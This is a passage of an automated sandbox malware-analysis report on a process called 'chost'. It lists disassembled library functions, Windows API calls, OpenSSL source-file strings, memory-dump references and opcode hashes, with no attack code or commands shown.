Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction ID: 1215b2d575163631c1e5e14db798a04ecb381d9b9d5665166299f9f957a8589e
Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction Fuzzy Hash: 35419232D1C782C3E2689B3295903696360FB947A4F10D379EA9C83ED6DF6CA4E0C740

Function 00007FFDF6A414F1 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 231COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDF6A87D72

Strings

..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFDF6A87C16, 00007FFDF6A87D1E, 00007FFDF6A87E3D, 00007FFDF6A87EA6
ssl3_read_n, xrefs: 00007FFDF6A87C0A, 00007FFDF6A87D12, 00007FFDF6A87E31, 00007FFDF6A87E9A

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
API String ID: 1452528299-4226281315
Opcode ID: f4b4061f66c18b7e1b70434eac6376b5ebf9f95154ff5b2a55139acb83583cca
Instruction ID: bdbcfbfb8b46dc4aeab70e65ba4d63a209078c5b876e37e4de55ee45004bf72b
Opcode Fuzzy Hash: f4b4061f66c18b7e1b70434eac6376b5ebf9f95154ff5b2a55139acb83583cca
Instruction Fuzzy Hash: 1DA16761B48A8682FB50AB35D860BBD3298EB45B88F548135DD2D0BFDEDF3CE8458700

Function 00007FFDF6A414BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDF6A9F1C3

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FFDF6A9F2B5, 00007FFDF6A9F45C, 00007FFDF6A9F48F
state_machine, xrefs: 00007FFDF6A9F2AE, 00007FFDF6A9F450, 00007FFDF6A9F483

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c$state_machine
API String ID: 1452528299-1722249466
Opcode ID: 92643a61a3c9fa44a3f46db5033dc0e5150ed97790e6335ebb9b51b1eac166c5
Instruction ID: 21397b1e2381b57f12c5db30a5047d8d5b245c677101c303704786cf605968ee
Opcode Fuzzy Hash: 92643a61a3c9fa44a3f46db5033dc0e5150ed97790e6335ebb9b51b1eac166c5
Instruction Fuzzy Hash: E2A14F61B0C64281FB64AA35D861BB9729CEF81B48F744131D93D47EDECE3CE8828751

Function 00007FFDF6A4127B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDF6A88AC5

Strings

ssl3_write_pending, xrefs: 00007FFDF6A88B62, 00007FFDF6A88BBE
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFDF6A88B6E, 00007FFDF6A88BCA

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
API String ID: 1452528299-1219543453
Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction ID: 4fd7fb0cb2af8d77d2e9cbaf75f2424db64344125d081779c5298db51749b019
Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction Fuzzy Hash: DB41AC62B09A8282EB549B25D864BBD73A8FF80B84F148175DA6D07FDEDF3DE4518300

Function 00007FF69436CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69436CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF69436CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF69436CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF69436CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF69436CD91

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 854a63cb4f7dda085c4bfc935009b4dd2d234d1d3f13c8418eb7930821cafe21
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 2B310320E0C24391FA74AB7794A33B93691EF46384F44C4BDEA4ECB2D7DE2EA405C650

Function 00007FF6943701AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943701F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943702E7

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 77da75c9d5c2532d6642757488da921f8e489b15e222c87b49855b6ecbea1396
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 38519372B0D641D6FA749A77948067E62A1EB44BA8F14C778EEFD867C5CE3CE441C600

Function 00007FF69437C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF69437C33D), ref: 00007FF69437C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF69437C33D), ref: 00007FF69437C1FA

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 288b2cef249928aea8583cc93b57c7aaf130ebc51f53ca54a9507e902d315e26
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 2611B27161CA8181DA208B36A894169A361EB45BF4F548379EEBD8B7E9CE7CD051C740

Function 00007FF694375994 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6943758A9), ref: 00007FF6943759C7
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6943758A9), ref: 00007FF6943759DD

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction ID: efd8dd3fddfb6255d0500bce521595e2629f620493ff0f0c38af7d35ee7ead1b
Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction Fuzzy Hash: F711517261C652C2EAA88B26A49113EB760FB85771F50427AFADDC1ED8EF6CD054CF00

Function 00007FF69437ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF69437AA45,?,?,00000000,00007FF69437AAFA), ref: 00007FF69437AC36
GetLastError.KERNEL32(?,?,?,00007FF69437AA45,?,?,00000000,00007FF69437AAFA), ref: 00007FF69437AC40

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 994d99068fe18482eb28fbef6b3132fdbb818ff5e869af92f1b4b1495ce75774
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 0D215031B2C68391EAB4677395D02791682DF847A0F0887BDDAAEC77D5CE6CA445D300

Function 00007FF69437BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437BF44

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 9ab76d91146c12c683e9f8f48505d85182839996bd983f3890179b410bd51a70
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: D641A432A1C201C7EA349B37A59127977A4EB56B94F108279DACEC77D1CF2DE402CB91

Function 00007FF694367F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF69436802A

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: e92a0dc91ef26cdd8f9e6f352d981f45ea0274e7df9581e9684e5913da368228
Instruction ID: 2fa1919d1eb75bb7de06042c7f166b5fec0f4c68b798813cb173d2aed1ecb6bb
Opcode Fuzzy Hash: e92a0dc91ef26cdd8f9e6f352d981f45ea0274e7df9581e9684e5913da368228
Instruction Fuzzy Hash: E421F621B0D652A5FE349B3365853BAA651FF49BC8F8C8878EE4C87786CE7DE041C610

Function 00007FF69437B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437BA32

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 4138969a18798ce02ba3a310b9bb7c338e5250efa121d14e20c41e60841d6992
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: 07313E31A1C642C5E7B16B76848167C3660EB50BA8F5181BDE9AD833D2DE7CB441C721

Function 00007FF694376004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694375F69

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 7846faf933c38a9319817f18cf0c2aeb26fee625e99eec61bc176603a3917ccd
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 88115432A1C642C1EA79AF62948027DA264EF95B80F94807DEBCCD7E96DF3DE440C700

Function 00007FF6943863C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943863E7

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 18b7f6026fffbf18c35cf9c540faf7e0e14103eaa1544f07c85eaf2fddd62a22
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: FC21537261864186DB718F2AD48037DB6A1EB84B54F64C278E69DC77D5DF7CD401CB00

Function 00007FFDF6A9F070 Relevance: 1.6, APIs: 1, Instructions: 303COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDF6A9F1C3

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
Instruction ID: b0116f10477641fc226d0b5064d4502c49cbb5685d918d8cfdf4d61ee8a5507f
Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
Instruction Fuzzy Hash: 7821A772B0878285EB649E35A861B7932E8EF41B4CF384435DA6D43ADDDE3CE841C751

Function 00007FF69437042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694370480

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: d06a6e3bc6d496ccfc456157caa01151f5c99b5d23cfc8bb8685d1509816ee5a
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 35018271A4C74180E924DF639981069A6A1EF85FE4B588679DE9C97BD6DE3CE101C700

Function 00007FF694369070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439

LoadLibraryExW.KERNEL32(?,00007FF694366466,?,00007FF69436336E), ref: 00007FF694369092

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction ID: 8deddff62237b3e1978d76e2a4fc38dcb44b58846adfa2320906562140bbfa87
Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction Fuzzy Hash: 72D08611B2414641EA64E777758652951519F89BC0E58C039EE4D43755DC3CD0418700

Function 00007FFDF6A4EF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FFDF6A4EE5D), ref: 00007FFDF6A4EF61

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
